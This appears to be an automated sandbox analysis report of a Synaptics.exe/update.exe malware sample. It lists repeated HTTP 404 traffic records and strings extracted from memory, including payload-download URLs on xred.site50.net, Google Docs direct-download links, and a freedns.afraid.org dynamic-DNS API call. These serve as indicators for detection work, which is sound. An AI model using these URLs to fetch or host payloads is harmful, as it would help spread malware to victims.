                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7z45iB0ARX5u3MxQjMPSbcDwq-cftwG5sF_3jq02fU7Z-mRD6GpkKAkGXgOM7_dM-sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:53 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-7hKJ590Xm6i-XiiW9FxH-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5orrEB9qlkxyhcV6NGf8_uClMGWCPlFjsp5XfjB5wYFYK5UDAc_BexqGD6Jy2UvlQJContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:53 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-VPAhLlS3gVnVB2aZGBzvzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6zc6DLj8AJKVJdoKNmXkjok4Ru8GBTsGZh95tqbFSTWdDddMEYUa3mKvcegqfBOOq7NaGB9FYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:54 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-z4uG3-sUtJNqf1Dhq6AX8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4qZbat0iEa26uGrSTl16nfrynlgqKbTnFMkwTUs48ShXA7I3nmL5nw9WG-_I9E9KVSQDL_cBAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:54 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-c03lKTbFa6iLlz0vIJ6vZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4uOzxGrYAQ_1aYpPTi8Zcd07FZAIX0fsK6EPhqZ1Ey8jFXMFeYyf35gwsSx0nLyzo0EiWKoYAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:57 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-x8g2EXCxuWQcn47evYvfIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4SBcgWnavZ7pLYMJzNsRdoIvktijRZUUschB-pbkhAqIKpNgH9Fcu0Fs_y29282kI8GMmtnwcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:57 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-U78VtMPmK4uud3xoHO8Ylg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lmtv9A4iIH2bvDrxK7iSt-2Tft7VQybRVPeHW8SJ1Hevhin0l_2QkG2XgpNaelXPkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:58 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SumRah05IUN4olPGo7IWFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC79--ZvcEd4i3p-zIEO9Pkvtog7Ewk9ot6uLCg_405wYe1K0PY7DAFrjpy4_fAM6TSqContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:58 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-FUT6AJLqDiSvpO3R6G_jyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mib
                                Source: Synaptics.exe, 00000010.00000002.2211766552.0000000000675000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978/T
                                Source: Synaptics.exe, 00000010.00000002.2211766552.0000000000675000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978O
                                Source: ._cache_update.exe, 0000000F.00000002.2555338528.0000000001776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/rentControlSet
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini0$
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                                Source: Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/...
                                Source: Synaptics.exe, 00000010.00000002.2296543685.000000001D60F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/4
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/6Smr;
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/INKr
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/
                                Source: Synaptics.exe, 00000010.00000002.2246970703.000000000C23E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2269548547.000000001163E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2331551344.000000002713E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2285525995.00000000193FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2274954141.000000001417E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                                Source: Synaptics.exe, 00000010.00000002.2252749844.000000000E67E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXG
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloH
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2275849788.0000000014A3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2335526800.0000000028DFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2275275421.000000001453E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2342554669.000000002B4BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2337881203.0000000029BBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2217867035.00000000054DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2307245600.000000001F23E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2285911384.00000000197BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2279313032.000000001647E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2287219190.000000001A43E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2240136052.000000000967E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2317415263.000000002367E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2270306006.0000000011FBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2286563882.0000000019DFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2286925884.000000001A1BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2238160491.0000000008B3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2237242285.000000000863E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2284630990.0000000018DBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2329308587.00000000264BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2328445487.0000000025FBE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#KVr
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#_
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#p
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#u
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$Dbyj
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$Ib
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%4
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%N
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%Y
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%i
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000752C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&9
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&DQr_
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&HSs
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&d
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(5
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(A
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(Gfv
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(Hf
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(d
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)y
